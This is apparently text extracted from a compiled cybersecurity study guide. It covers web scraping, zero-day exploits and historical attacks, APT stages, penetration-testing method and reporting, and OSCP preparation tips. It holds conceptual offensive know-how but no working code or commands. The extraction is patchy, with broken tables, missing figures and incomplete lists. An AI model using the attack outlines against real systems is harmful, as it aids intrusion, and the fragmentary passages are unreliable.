any user are immediately propagated across the entire user-base. This enables rapid
response to newly disclosed vulnerability and zero-day threats.
WEB SCRAPING-Web scraping is the process of using bots to extract content and data from a
website.
Unlike screen scraping, which only copies pixels displayed onscreen, web scraping
extracts underlying HTML code and, with it, data stored in a database. The scraper can
then replicate entire website content elsewhere.
Web scraping is used in a variety of digital businesses that rely on data harvesting.
Legitimate use cases include:
Search engine bots crawling a site, analyzing its content and then ranking it.
Price comparison sites deploying bots to auto-fetch prices and product descriptions for
allied seller websites.
Market research companies using scrapers to pull data from forums and social media
(e.g., for sentiment analysis).
Web scraping is also used for illegal purposes, including the undercutting of prices and
the theft of copyrighted content. An online entity targeted by a scraper can suffer severe
financial losses, especially if it’s a business strongly relying on competitive pricing
models or deals in content distribution.
SCRAPER TOOLS AND BOTS
57
Web scraping tools are software (i.e., bots) programmed to sift through databases and
extract information. A variety of bot types are used, many being fully customizable to:
Recognize unique HTML site structures
Extract and transform content
Store scraped data
Extract data from APIs
Since all scraping bots have the same purpose—to access site data—it can be difficult to
distinguish between legitimate and malicious bots.
That said, several key differences help distinguish between the two.
Legitimate bots are identified with the organization for which they scrape. For example,
Googlebot identifies itself in its HTTP header as belonging to Google. Malicious bots,
conversely, impersonate legitimate traffic by creating a false HTTP user agent.
Legitimate bots abide a site’s robot.txt file, which lists those pages a bot is permitted to
access and those it cannot. Malicious scrapers, on the other hand, crawl the website
regardless of what the site operator has allowed.
Resources needed to run web scraper bots are substantial—so much so that legitimate
scraping bot operators heavily invest in servers to process the vast amount of data being
extracted.
A perpetrator, lacking such a budget, often resorts to using a botnet—geographically
dispersed computers, infected with the same malware and controlled from a central
location. Individual botnet computer owners are unaware of their participation. The
combined power of the infected systems enables large scale scraping of many different
websites by the perpetrator.
58
In price scraping, a perpetrator typically uses a botnet from which to launch scraper bots
to inspect competing business databases. The goal is to access pricing information,
undercut rivals and boost sales.
Attacks frequently occur in industries where products are easily comparable and price
plays a major role in purchasing decisions. Victims of price scraping can include travel
agencies, ticket sellers and online electronics vendors.
For example, smartphone e-traders, who sell similar products for relatively consistent
prices, are frequent targets. To remain competitive, they’re motivated to offer the best
prices possible, since customers usually go for the lowest cost offering. To gain an edge,
a vendor can use a bot to continuously scrape his competitors’ websites and instantly
update his own prices accordingly.
For perpetrators, a successful price scraping can result in their offers being prominently
featured on comparison websites—used by customers for both research and purchasing.
Meanwhile, scraped sites often experience customer and revenue losses.
CONTENT SCRAPING
Content scraping comprises large-scale content theft from a given site. Typical targets
include online product catalogues and websites relying on digital content to drive
business. For these enterprises, a content scraping attack can be devastating.
For example, online local business directories invest significant amounts of time, money
and energy constructing their database content. Scraping can result in it all being released
into the wild, used in spamming campaigns or resold to competitors. Any of these events
is likely to impact a business’ bottom line and its daily operations.
The following is excerpted from a complaint, filed by Craigslist, detailing its experience
with content scraping. It reinforces how damaging the practice can be:
“[The content scraping service] would, on a daily basis, send an army of digital robots to
craigslist to copy and download the full text of millions of craigslist user ads. [The
service] then indiscriminately made those misappropriated listings available—through its
so-called ‘data feed’—to any company that wanted to use them, for any purpose. Some
such ‘customers’ paid as much as $20,000 per month for that content…”
According to the claim, scraped data was used for spam and email fraud, among other
activities:
“[The defendants] then harvest craigslist users’ contact information from that database,
and initiate many thousands of electronic mail messages per day to the addresses
harvested from craigslist servers…. [The messages] contain misleading subject lines and
content in the body of the spam messages, designed to trick craigslist users into switching
from using craigslist’s services to using [the defenders’] service…”
WEB SCRAPING PROTECTION
The increased sophistication in malicious scraper bots has rendered some common
security measures ineffective. For example, headless browser bots can masquerade as
humans as they fly under the radar of most mitigation solutions.
59
To counter advances made by malicious bot operators, Imperva uses granular traffic
analysis. It ensures that all traffic coming to your site, human and bot alike, is completely
legitimate.
The process involves the cross verification of factors, including:
HTML fingerprint – The filtering process starts with granular inspection of HTML
headers. These can provide clues as to whether a visitor is human or bot, and malicious or
safe. Header signatures are compared against a constantly updated database of over 10
million known variants.
IP reputation – We collect IP data from all attacks against our clients. Visits from IP
addresses having a history of being used in assaults are treated with suspicion and are
more likely to be scrutinized further.
Behavior analysis – Tracking the ways visitors interact with a website can reveal
abnormal behavioral patterns, such as a suspiciously aggressive rate of requests and
illogical browsing patterns. This helps identify bots that pose as human visitors.
Progressive challenges – We use a set of challenges, including cookie support and
JavaScript execution, to filter out bots and minimize false positives. As a last resort, a
CAPTCHA challenge can weed out bots attempting to pass themselves off as humans.
ZERO-DAY (0DAY) EXPLOIT-A zero-day (0day) exploit is a cyber attack targeting a
software vulnerability which is unknown to the software vendor or to antivirus vendors. The
attacker spots the software vulnerability before any parties interested in mitigating it, quickly
creates an exploit, and uses it for an attack. Such attacks are highly likely to succeed because
defenses are not in place. This makes zero-day attacks a severe security threat.
Typical attack vectors include Web browsers, which are common targets due to their
ubiquity, and email attachments that exploit vulnerabilities in the application opening the
attachment, or in specific file types such as Word, Excel, PDF or Flash.
A related concept is zero-day malware — a computer virus for which specific antivirus
software signatures are not yet available, so signature-based antivirus software cannot
stop it.
Typical targets for a zero-day exploit include:
Government departments.
Large enterprises.
Individuals with access to valuable business data, such as intellectual property.
Large numbers of home users who use a vulnerable system, such as a browser or
operating system. Hackers can use vulnerabilities to compromise computers and build
massive botnets.
Hardware devices, firmware and Internet of Things (IoT).
In some cases governments use zero-day exploits to attack individuals, organizations or
countries who threaten their natural security.
Because zero-day vulnerabilities are valuable for different parties, a market exists in
which organizations pay researchers who discover vulnerabilities. In addition to this
‘white market’, there are gray and black markets in which zero-day vulnerabilities are
traded, without public disclosure, for up to hundreds of thousands of dollars.
60
EXAMPLES OF ZERO-DAY ATTACKS
Some high-profile examples of zero-day attacks include:
Stuxnet: This malicious computer worm targeted computers used for manufacturing
purposes in several countries, including Iran, India, and Indonesia. The primary target
was Iran’s uranium enrichment plants, with the intention of disrupting the country’s
nuclear program.
The zero-day vulnerabilities existed in software running on industrial computers known
as programmable logic controllers (PLCs), which ran on Microsoft Windows. The worm
infected the PLCs through vulnerabilities in Siemens Step7 software, causing the PLCs to
carry out unexpected commands on assembly line machinery, sabotaging the centrifuges
used to separate nuclear material.
Sony zero-day attack: Sony Pictures was the victim of a zero-day exploit in late 2014.
The attack crippled Sony’s network and led to the release of sensitive corporate data on
file-sharing sites. The compromised data included details of forthcoming movies,
business plans, and the personal email addresses of senior Sony executives. The details of
the exact vulnerability exploited in the Sony attack remains unknown.
RSA: In 2011, hackers used a then-unpatched vulnerability in Adobe Flash Player to gain
access to the network of security company RSA. The attackers sent emails with Excel
spreadsheet attachments to small groups of RSA employees. The spreadsheets contained
an embedded Flash file that exploited the zero-day Flash vulnerability. When one of the
employees opened the spreadsheet, the attacked installed the Poison Ivy remote
administration tool to take control of the computer.
Once they gained access to the network, attackers searched for sensitive information,
copied it and transmitted it to external servers they controlled. RSA admitted that among
the data stolen was sensitive information related to the company’s SecurID two-factor
authentication products, used around the world for access to sensitive data and devices.
Operation Aurora: This 2009 zero-day exploit targeted the intellectual property of several
major enterprises, including Google, Adobe Systems, Yahoo, and Dow Chemical. The
vulnerabilities existed in both Internet Explorer and Perforce; the latter was used by
Google to manage its source code.
ZERO-DAY VULNERABILITY DETECTION
By definition, no patches or antivirus signatures exist yet for zero-day exploits, making
them difficult to detect. However, there are several ways to detect previously unknown
software vulnerabilities.
VULNERABILITY SCANNING
Vulnerability scanning can detect some zero-day exploits. Security vendors who offer
vulnerability scanning solutions can simulate attacks on software code, conduct code
reviews, and attempt to find new vulnerabilities that may have been introduced after a
software update.
61
This approach cannot detect all zero-day exploits. But even for those it detects, scanning
is not enough—organizations must act on the results of a scan, perform code review and
sanitize their code to prevent the exploit. In reality most organizations are slow to
respond to newly discovered vulnerabilities, while attackers can be very quick to exploit
a zero-day exploit.
PATCH MANAGEMENT
Another strategy is to deploy software patches as soon as possible for newly discovered
software vulnerabilities. While this cannot prevent zero-day attacks, quickly applying
patches and software upgrades can significantly reduce the risk of an attack.
However, there are three factors that can delay the deployment of security patches.
Software vendors take time to discover vulnerabilities, develop a patch and distribute it to
users. It can also take time for the patch to be applied on organizational systems. The
longer this process takes, the higher the risk of a zero-day attack.
INPUT VALIDATION AND SANITIZATION
Possibly the most effective way to prevent zero-day attacks is deploying a web
application firewall (WAF) on the network edge. A WAF reviews all incoming traffic
and filters out malicious inputs that might target security vulnerabilities.
Input validation solves many of the issues inherent in vulnerability scanning and patch
management. It doesn’t leave organizations unprotected while they are patching systems
or sanitizing code—processes that can take time. It is operated by security experts and is
much more flexible, able to adapt and respond to new threats in real time.
ZERO-DAY INITIATIVE
A program established to reward security researchers for responsibly disclosing
vulnerabilities, instead of selling the information on the black market. Its objective is to
create a broad community of vulnerability researchers who can discover security
vulnerabilities before hackers do, and alert software vendors.
IMPERVA ZERO-DAY THREAT MITIGATION
Vulnerability scanning and patch management are partial solutions to zero-day attacks.
And they create a large window of vulnerability, due to the time it takes to develop and
apply patches and code fixes.
Imperva’s Web Application Firewall (WAF) is a managed input validation service
deployed at the edge of your network which intelligently filters and verifies incoming
traffic, blocking attacks at the network edge.
62
Imperva cloud-based WAF blocks zero-day attacks by using crowdsourced security to
identify new threats
Imperva cloud-based WAF leverages crowdsourced security to protect against zero-day
attacks, aggregating attack data to react to threats instantly. As soon as a new threat is
identified anywhere on the Incapsula network, a mitigation path is quickly deployed to
safeguard the entire user base.
ADVANCED PERSISTENT THREAT (APT)- An advanced persistent threat (APT) is a broad
term used to describe an attack campaign in which an intruder, or team of intruders, establishes
an illicit, long-term presence on a network in order to mine highly sensitive data.
The targets of these assaults, which are very carefully chosen and researched, typically
include large enterprises or governmental networks. The consequences of such intrusions
are vast, and include:
Intellectual property theft (e.g., trade secrets or patents)
Compromised sensitive information (e.g., employee and user private data)
The sabotaging of critical organizational infrastructures (e.g., database deletion)
Total site takeovers
Executing an APT assault requires more resources than a standard web application attack.
The perpetrators are usually teams of experienced cybercriminals having substantial
financial backing. Some APT attacks are government-funded and used as cyber warfare
weapons.
APT attacks differ from traditional web application threats, in that:
They’re significantly more complex.
They’re not hit and run attacks—once a network is infiltrated, the perpetrator remains in
order to attain as much information as possible.
63
They’re manually executed (not automated) against a specific mark and indiscriminately
launched against a large pool of targets.
They often aim to infiltrate an entire network, as opposed to one specific part.
More common attacks, such as remote file inclusion (RFI), SQL injection and cross-site
scripting (XSS), are frequently used by perpetrators to establish a foothold in a targeted
network. Next, Trojans and backdoor shells are often used to expand that foothold and
create a persistent presence within the targeted perimeter.
ADVANCED PERSISTENT THREAT (APT) PROGRESSION
A successful APT attack can be broken down into three stages: 1) network infiltration, 2)
the expansion of the attacker’s presence and 3) the extraction of amassed data—all
without being detected.
STAGE 1 – INFILTRATION
Enterprises are typically infiltrated through the compromising of one of three attack
surfaces: web assets, network resources or authorized human users.
This is achieved either through malicious uploads (e.g., RFI, SQL injection) or social
engineering attacks (e.g., spear phishing)—threats faced by large organizations on a
regular basis.
Additionally, infiltrators may simultaneously execute a DDoS attack against their target.
This serves both as a smoke screen to distract network personnel and as a means of
weakening a security perimeter, making it easier to breach.
Once initial access has been achieved, attackers quickly install a backdoor shell—
malware that grants network access and allows for remote, stealth operations. Backdoors
can also come in the form of Trojans masked as legitimate pieces of software.
STAGE 2 – EXPANSION
After the foothold is established, attackers move to broaden their presence within the
network.
This involves moving up an organization’s hierarchy, compromising staff members with
access to the most sensitive data. In doing so, they’re able to gather critical business
information, including product line information, employee data and financial records.
Depending on the ultimate attack goal, the accumulated data can be sold to a competing
enterprise, altered to sabotage a company’s product line or used to take down an entire
organization. If sabotage is the motive, this phase is used to subtly gain control of
multiple critical functions and manipulate them in a specific sequence to cause maximum
damage. For example, attackers could delete entire databases within a company and then
disrupt network communications in order to prolong the recovery process.
STAGE 3- EXTRACTION
While an APT event is underway, stolen information is typically stored in a secure
location inside the network being assaulted. Once enough data has been collected, the
thieves need to extract it without being detected.
Typically, white noise tactics are used to distract your security team so the information
can be moved out. This might take the form of a DDoS attack, again tying up network
personnel and/or weakening site defenses to facilitate extraction.
64
65
Whitelisting is a way of controlling domains that can be accessed from your network, as
well as applications that can be installed by your users. This is another useful method of
reducing the success rate of APT attacks by minimizing available attack surfaces.
This security measure is far from foolproof, however, as even the most trusted domains
can be compromised. It’s also known that malicious files commonly arrive under the
guise of legitimate software. In addition, older software product versions are prone to
being compromised and exploited.
For effective whitelisting, strict update policies should be enforced to ensure your users
are always running the latest version of any application appearing on the list.
ACCESS CONTROL
For perpetrators, your employees typically represent the largest and most vulnerable soft-
spot in your security perimeter. More often than not, this is why your network users are
viewed by intruders as an easy gateway to infiltrate your defenses, while expanding their
hold within your security perimeter.
Here, likely targets fall into one of the following three categories:
Careless users who ignore network security policies and unknowingly grant access to
potential threats.
Malicious insiders who intentionally abuse their user credentials to grant perpetrator
access.
Compromised users whose network access privileges are compromised and used by
attackers.
Developing effective controls requires a comprehensive review of everyone in your
organization—especially the information to which they have access. For example,
classifying data on a need-to-know basis helps block an intruder’s ability to hijack login
credentials from a low-level staff member, using it to access sensitive materials.
Key network access points should be secured with two-factor authentication (2FA). It
requires users to use a second form of verification when accessing sensitive areas
(typically a passcode sent to the user’s mobile device). This prevents unauthorized actors
disguised as legitimate users from moving around your network.
ADDITIONAL MEASURES
In addition to those above, these are best practice measures to take when securing your
network:
Patching network software and OS vulnerabilities as quickly as possible.
Encryption of remote connections to prevent intruders from piggy-backing them to
infiltrate your site.
Filtering incoming emails to prevent spam and phishing attacks targeting your network.
Immediate logging of security events to help improve whitelists and other security
policies.
66
Steps of Penetration Testing Method
The following are the seven steps of penetration testing −
Reconnaissance
Reconnaissance includes an analysis of the preliminary information. Many times, a tester doesn’t
have much information other than the preliminary information, i.e., an IP address or IP address
67
block. The tester starts by analyzing the available information and, if required, requests for more
information such as system descriptions, network plans, etc. from the client. This step is the
passive penetration test, a sort of. The sole objective is to obtain a complete and detailed
information of the systems.
Discovery
In this step, a penetration tester will most likely use the automated tools to scan target assets for
discovering vulnerabilities. These tools normally have their own databases giving the details of
the latest vulnerabilities. However, tester discover
Network Discovery − Such as discovery of additional systems, servers, and other devices.
Host Discovery − It determines open ports on these devices.
Service Interrogation − It interrogates ports to discover actual services which are running
on them.
Final Analysis
This step primarily considers all the steps conducted (discussed above) till that time and an
evaluation of the vulnerabilities present in the form of potential risks. Further, the tester
recommends to eliminate the vulnerabilities and risks. Above all, the tester must assure the
transparency of the tests and the vulnerabilities that it disclosed.
68
Report Preparation
Report preparation must start with overall testing procedures, followed by an analysis of
vulnerabilities and risks. The high risks and critical vulnerabilities must have priorities and then
followed by the lower order.
However, while documenting the final report, the following points needs to be considered −
Overall summary of penetration testing.
Details of each step and the information gathered during the pen testing.
Details of all the vulnerabilities and risks discovered.
Details of cleaning and fixing the systems.
Suggestions for future security.
Generally, these two terms, i.e., Penetration Testing and Vulnerability assessment are used
interchangeably by many people, either because of misunderstanding or marketing hype.
But, both the terms are different from each other in terms of their objectives and other
means. However, before describing the differences, let us first understand both the terms
one-by one.
Penetration Testing
Penetration testing replicates the actions of an external or/and internal cyber attacker/s that
is intended to break the information security and hack the valuable data or disrupt the
normal functioning of the organization. So, with the help of advanced tools and techniques,
a penetration tester (also known as ethical hacker) makes an effort to control critical
systems and acquire access to sensitive data.
Vulnerability Assessment
On the other hand, a vulnerability assessment is the technique of identifying (discovery)
and measuring security vulnerabilities (scanning) in a given environment. It is a
comprehensive assessment of the information security position (result analysis). Further,
it identifies the potential weaknesses and provides the proper mitigation measures
(remediation) to either remove those weaknesses or reduce below the risk level.
The following diagram summarizes the vulnerability assessment −
69
The following table illustrates the fundamental differences between penetration testing and
vulnerability assessments −
Cleans up the system and gives final Attempts to mitigate or eliminate the potential
report. vulnerabilities of valuable resources.
70
It is non-intrusive, documentation and Comprehensive analysis and through review of
environmental review and analysis. the target system and its environment.
71
For better understanding, let us discuss each of them in detail −
72
White Box Penetration Testing
This is a comprehensive testing, as tester has been provided with whole range of information
about the systems and/or network such as Schema, Source code, OS details, IP address, etc. It is
normally considered as a simulation of an attack by an internal source. It is also known as
structural, glass box, clear box, and open box testing.
White box penetration testing examines the code coverage and does data flow testing, path testing,
loop testing, etc.
73
The response or workflow of the system − This is the third area that needs to be tested.
Social engineering gathers information on human interaction to obtain information about
an organization and its computers. It is beneficial to test the ability of the respective
organization to prevent unauthorized access to its information systems. Likewise, this test
is exclusively designed for the workflow of the organization/company.
Both manual penetration testing and automated penetration testing are conducted for the same
purpose. The only difference between them is the way they are conducted. As the name suggests,
manual penetration testing is done by human beings (experts of this field) and automated
penetration testing is done by machine itself.
This chapter will help you learn the concept, differences, and applicability of both the terms.
74
Types of Manual Penetration Testing
Manual penetration testing is normally categorized in two following ways −
Focused Manual Penetration Testing − It is a much focused method that tests specific
vulnerabilities and risks. Automated penetration testing cannot perform this testing; it is
done only by human experts who examine specific application vulnerabilities within the
given domains.
Comprehensive Manual Penetration Testing − It is through testing of whole systems
connected with each other to identify all sorts of risk and vulnerability. However, the
function of this testing is more situational, such as investigating whether multiple lower-
risk faults can bring more vulnerable attack scenario, etc
75
What is Automated Penetration Testing?
Automated penetration testing is much faster, efficient, easy, and reliable that tests the
vulnerability and risk of a machine automatically. This technology does not require any expert
engineer, rather it can be run by any person having least knowledge of this field.
Tools for automated penetration testing are Nessus, Metasploit, OpenVAs, backtract (series 5),
etc. These are very efficient tools that changed the efficiency and meaning of penetration testing.
However, the following table illustrates the fundamental difference between the manual and
automated penetration testing −
Manual Penetration Testing Automated Penetration
Testing
It requires different tools for the testing. It has integrated tools does
required anything from
outside.
In this type of testing, results can vary from test to test. It has fixed result.
Penetration testing, normally consists of information gathering, vulnerability and risk analysis,
vulnerability exploits, and final report preparation.
76
It is also essential to learn the features of various of tools which are available with penetration
testing. This chapter provides information and insights about these features.
77
Remote active OS
fingerprinting
Xprobe Linux Free
Port Scanning
TCP fingerprinting
78
Develop and execute
exploit code against a
Metasploit All versions of Unix and
remote target Free
Framework Windows
Test vulnerability of
computer systems
Computer systems and associated networks normally consist of a large number of devices and
most of them play a major role in conducting total works and businesses of the respective system.
A minor flaw at any point of time, and at any part of these devices may cause great damage to
your business. Therefore, all of them are vulnerable to risk and need to be secured properly.
79
External Infrastructure Testing
The penetration test, targeting the external infrastructure discovers what a hacker could do with
your networks, which is easily accessible through the Internet.
In this testing, a tester normally replicates the same kind of attacks that the hackers can use by
finding and mapping the security flaws in your external infrastructure.
There are various benefits of leveraging external infrastructure penetration testing, as it −
Identifies the flaws within the firewall configuration that could be misused
Finds out how information can be leaked out from your system by an attacker
Suggests how these issues can be fixed
Prepares a comprehensive report highlighting the security risk of the border networks, and
suggests solutions
Ensures overall efficiency and productivity of your business
80
Cloud and Virtualization Penetration Testing
As you buy a public server or wave space, it significantly increases the risks of data breach.
Further, identifying the attacker on cloud environment is difficult. An attacker can also buy
hosting a Cloud facility to get access to your new Cloud data.
In fact, most of the Cloud hosting is implemented on virtual infrastructure, causing Virtualization
risk that an attacker can easily access.
Cloud and Virtualization penetration testing benefits as it −
Discovers the real risks within the virtual environment and suggests the methods and costs to fix the
threats and flaws.
Provides guidelines and an action plan how to resolve the issue/s.
Improves the overall protection system.
Prepares a comprehensive security system report of the Cloud computing and Virtualization, outline
the security flaw, causes and possible solutions.
81
Past Experience
The following questions will help you to hire an effective penetration tester −
How many years of experience does the penetration tester has?
Is he an independent penetration tester or working for an organization?
With how many companies he worked as penetration tester?
Has he performed penetration testing for any organization, which has similar size and
scope as yours?
What type of experience does the penetration tester has? For example, conducting
network-layer penetration testing etc
You may also ask for the reference from other customers for whom he worked.
When hiring a penetration tester, it is important to evaluate the past year testing experience of the
organization for which he (tester) has worked as it is related to the technologies specifically
deployed by him within the target environment.
In addition to the above, for complex situations and typical client requirements, it is recommended
to evaluate a tester’s capability to handle similar environment in his/her earlier project.
Report Planning
Information Collection
82
Writing the First Draft
Review and Finalization
Report Planning
Report planning starts with the objectives, which help readers to understand the main points of
the penetration testing. This part describes why the testing is conducted, what are the benefits of
pen testing, etc. Secondly, report planning also includes the time taken for the testing.
Major elements of report writing are −
Objectives − It describes the overall purpose and benefits of pen testing.
Time − Inclusion of time is very important, as it gives the accurate status of the system.
Suppose, if anything wrong happens later, this report will save the tester, as the report will
illustrate the risks and vulnerabilities in the penetration testing scope during the specific
period of time.
Target Audience − Pen testing report also needs to include target audience, such as
information security manager, information technology manager, chief information
security officer, and technical team.
Report Classification − Since, it is highly confidential which carry server IP addresses,
application information, vulnerability, threats, it needs to be classified properly. However,
this classification needs to be done on the basis of target organization which has an
information classification policy.
Report Distribution − Number of copies and report distribution should be mentioned in
the scope of work. It also needs to mention that the hardcopies can be controlled by
printing a limited number of copies attached with its number and the receiver’s name.
Information Collection
Because of the complicated and lengthy processes, pen tester is required to mention every step to
make sure that he collected all the information in all the stages of testing. Along with the methods,
he also needs to mention about the systems and tools, scanning results, vulnerability assessments,
details of his findings, etc.
83
Writing the First Draft
Once, the tester is ready with all tools and information, now he needs to start the first draft.
Primarily, he needs to write the first draft in the details – mentioning everything i.e. all activities,
processes, and experiences.
Review and Finalization
Once the report is drafted, it has to be reviewed first by the drafter himself and then by his seniors
or colleagues who may have assisted him. While reviewing, reviewer is expected to check every
detail of the report and find any flaw that needs to be corrected.
Content of Penetration Testing Report
Following is the typical content of a penetration testing report −
Executive Summary
Scope of work
Project objectives
Assumption
Timeline
Summary of findings
Summary of recommendation
Methodology
Planning
Exploitation
Reporting
Detail Findings
References
Appendix
The fast growth of the internet has changed the way of life for everyone. These days, most of the
private and public works are internet dependent. Government’s all secret working plans, and
operations are internet based. All these things made the life very simple and easily accessible.
84
But with the good news, there is also a dark face of this development i.e., the criminal hacker.
There is no geopolitical limitation of these criminal hackers, they can hack any system from any
part of the world. They can damage confidential data and credit history very badly.
Therefore, to protect from the criminal hackers, the concept of the ethical hacker evolved. This
chapter discusses the concept and the role of an ethical hacker.
Who are Ethical Hackers?
Ethical hackers are the computer experts who are legally allowed to hack a computer system with
the objective to protect from the criminal hackers. An ethical hacker identifies the vulnerabilities
and risks of a system and suggests how to eliminate them.
Who are Criminal Hackers?
Criminal hackers are those computer programming experts who hack others systems with the
intention to steal data, steal money, defame others credit, destroy others data, blackmail someone,
etc.
What can Criminal Hackers do?
Once a system is hacked, a criminal hacker can do anything with that system. The following two
images C.C. Palmer, which is published on pdf.textfiles.com, illustrates a simple example of a
hacked page −
Here is a screenshot of a webpage taken before it was hacked −
85
And, here is the screenshot of the same webpage after it was hacked −
86
procedures. Finally, prepare a final report of his all ethical activities that he did and observed
while performing penetration testing.
Types of Hackers
Hackers are normally divided into three categories.
Penetration Testing
Penetration testing is a specific term and focuses only on discovering the vulnerabilities, risks,
and target environment with the purpose of securing and taking control of the system. Or in other
words, penetration testing targets respective organization’s defense systems consisting of all
computer systems and its infrastructure.
87
Ethical Hacking
On the other hand, ethical hacking is an extensive term that covers all hacking techniques, and
other associated computer attack techniques. So, along with discovering the security flaws and
vulnerabilities, and ensuring the security of the target system, it is beyond hacking the system but
with a permission in order to safeguard the security for future purpose. Hence, we can that, it is
an umbrella term and penetration testing is one of the features of ethical hacking.
The following are the major differences between Penetration testing and Ethical hacking which
is listed in the following table −
Penetration Testing Ethical Hacking
Any tester with some inputs of It requires to be an expert professional in the subject,
penetration testing can perform who has the obligatory certification of ethical hacking
pen test. to be effective.
Paper work in less compared to A detailed paper works are required, including legal
Ethical hacking. agreement etc.
To perform this type of testing, Ethical hacking involves lot of time and effort
less time required. compared to Penetration testing.
88
Normally, accessibility of whole
computer systems and its
As per the situation, it normally requires a whole range
infrastructure doesn’t require.
of accessibility all computer systems and its
Accessibility is required only for
infrastructure.
the part for which the tester
performing pen testing.
Since penetration techniques are used to protect from threats, the potential attackers are also
swiftly becoming more and more sophisticated and inventing new weak points in the current
applications. Hence, a particular sort of single penetration testing is not sufficient to protect your
security of the tested systems.
As per the report, in some cases, a new security loophole is discovered and successful attack took
place immediately after the penetration testing. However, it does not mean that the penetration
testing is useless. It only means that, this is true that with thorough penetration testing, there is no
guarantee that a successful attack will not take place, but definitely, the test will substantially
reduce the possibility of a successful attack.
Because of the swift pace of developments in the field of information and technology, the success
story of penetration testing is comparatively short-lived. As more protection to the systems is
required, more often than you need to perform penetration testing in order to diminish the
possibility of a successful attack to the level that is appreciated by the company.
Following are the major limitations of Penetration Testing −
Limitation of Time − As all of us know, penetration testing is not at all time bound
exercise; nevertheless, experts of penetration testing have allotted a fixed amount of time
for each test. On the other hand, attackers have no time constrains, they plan it in a week,
month, or even years.
Limitation of Scope − Many of the organizations do not test everything, because of their
own limitations, including resource constraints, security constraints, budget constraints,
etc. Likewise, a tester has limited scope and he has to leave many parts of the systems that
might be much more vulnerable and can be a perfect niche for the attacker.
Limitation on Access − More often testers have restricted access to the target
environment. For example, if a company has carried out the penetration test against its
DMZ systems from all across its internet networks, but what if the attackers attack through
the normal internet gateway.
Limitation of Methods − There are chances that the target system can crash during a
penetration test, so some of the particular attack methods would likely be turned off the
table for a professional penetration tester. For example, producing a denial of service flood
to divert a system or network administrator from another attack method, usually an ideal
tactic for a really bad guy, but it is likely to fall outside of the rules of engagement for
most of the professional penetration testers.
Limitation of Skill-sets of a Penetration Tester − Usually, professional penetration
testers are limited as they have limited skills irrespective of their expertise and past
experience. Most of them are focused on a particular technology and having rare
knowledge of other fields.
89
Limitation of Known Exploits − Many of the testers are aware with only those exploits,
which are public. In fact, their imaginative power is not as developed as attackers.
Attackers normally think much beyond a tester’s thinking and discover the flaw to attack.
Limitation to Experiment − Most of the testers are time bound and follow the instructions
already given to them by their organization or seniors. They do not try something new.
They do not think beyond the given instructions. On the other hand, attackers are free to
think, to experiment, and to create some new path to attack.
Moreover, penetration testing can neither replace the routine IT security tests, nor it can substitute
a general security policy, but rather, penetration testing supplements the established review
procedures and discovers new threats.
ensure an exhaustive discovery of every instance where a security control’s effectiveness is
insufficient. Identifying a cross-site scripting vulnerability or risk in one area of an application
may not definitely expose all instances of this vulnerability present in the application. This chapter
illustrates the concept and utility of remediation.
What is Remediation?
Remediation is an act of offering an improvement to replace a mistake and set it right. Often the
presence of vulnerability in one area may indicate weakness in process or development practices
that could have replicated or enabled similar vulnerability in other locations. Therefore, while
remediating, it is important for the tester to carefully investigate the tested entity or applications
with ineffective security controls in mind.
Because of these reasons, the respective company should take steps to remediate any exploitable
vulnerability within a reasonable period of time after the original penetration test. In fact, as soon
as the company has completed these steps, the pen tester should perform a retest to validate the
newly implemented controls which are capable to mitigate the original risk.
The remediation efforts extending for a longer period after the initial pen test possibly require
performing a new testing engagement to ensure accurate results of the most current environment.
This determination should be made after a risk analysis of how much change has occurred since
the original testing was completed.
Moreover, in specific conditions, the flagged security problem may illustrate a basic flaw in
respective environment or application. Therefore, the scope of a retest should consider whether
any changes caused by remediation identified from the test are classified as significant. All
changes should be retested; however, whether an entire system retest is necessary or not will be
determined by the risk assessment of the changes.
Before allowing someone to test sensitive data, companies normally take measures regarding the
availability, confidentiality, and integrity of data. For this agreement to be in place, legal
compliance is a necessary activity for an organization.
The most important legal regulations which have to be observed when establishing and
maintaining security and authorization systems are presented below in context for using in
implementing penetration tests.
90
What are the Legal Issues?
Following are some of the issues which may arise between a tester and his client −
The tester is unknown to his client – so, on what ground, he should be given access of
sensitive data
Who will take the guarantee of security of the lost data?
The client may blame for the loss of data or confidentiality to tester
Penetration testing may affect system performance, and can raise confidentiality and integrity
issues; therefore, this is very important, even in an internal penetration testing, which is performed
by an internal staff to get permission in writing. There should be a written agreement between a
tester and the company/organization/individual to clarify all the points regarding the data security,
disclosure, etc. before commencing testing.
A statement of intent should be drawn up and duly signed by both the parties prior to any testing
work. It should be clearly outlined that the scope of the job and that, you may and may not be
doing while performing vulnerability tests.
For the tester, it is important to know who owns the business or systems which are being requested
to work on, and the infrastructure between testing systems and their targets that may be potentially
affected by pen testing. The idea is to make sure;
the tester has the permission in writing, with clearly defined parameters.
the company has the details of its pen tester and an assurance that he would not leak any
confidential data.
A legal agreement is beneficial for both the parties. Remember, regulations change from country
to country, so keep yourself abreast with the laws of your respective country. Sign an agreement
only after considering the respective laws.
Many beginners don’t understand that hacking or penetration testing follows a very logical
process and when broken down can really clarify tasks and goals. During this write-up I will use
a fake company as an example and use very general examples of how each step is completed.
Our target will be a fake company called SillyVictim and all we know is that they have a
webpage and they have an internal company network. Our goal is infiltrate this company and
obtain admin privileges. I’ll be using my metasploitable and Kali VM’s from my previous
lesson as examples on how to apply this methodology.
Before you can take the OSCP exam, you are required to take the Penetration Testing
with Kali (PWK) course. Taking the course is mandatory for you to become eligible
to take the OSCP. In addition to the knowledge you gain from the course, it opens
doors to several career opportunities in information security. Of course, those who
pass get bragging rights too.
1. Linux and Windows Environment - You need to be familiar with both. These will help
you spot clues for privilege escalation. I’m a Windows guy and during the labs, I learned
Linux the hard way.
91
2. Linux and Windows Commands - Knowing Linux and Windows commands helps a lot.
Brush up on them!
3. Basic Programming Skills - Expect to debug and rewrite exploits, so know Bash
Scripting. This will help you to automate redundant tasks.
4. Web application attacks (SQLi, XSS, Local File Inclusion, Remote File Inclusion, and
Command Execution) - Expect a lot of web application content in the labs. Also, practice
bypassing web security filters for injection attacks.
5. Metasploit Framework – Brush up on creating payloads with different formats, using
multi handlers, and using staged vs non-staged payloads. Knowing these things will save
you some time during your exam.
6. Nmap - Different scanning techniques and Nmap NSE Scripts will help you a lot during
your lab or exam.
7. Netcat and Ncat - You’ll be using these a lot during the OSCP.
8. Wireshark and tcpdump - Those are important because you’ll be using Wireshark to
debug your exploit - or tcpdump, when machines don’t have a GUI.
9. Windows and Linux Privilege Escalation - Aside from using kernel exploits, brush up
on misconfigurations like weak service/file permissions and NFS/Shares.
10. Escaping restricted shells and spawning shells - You’ll encounter these a lot during
your OSCP.
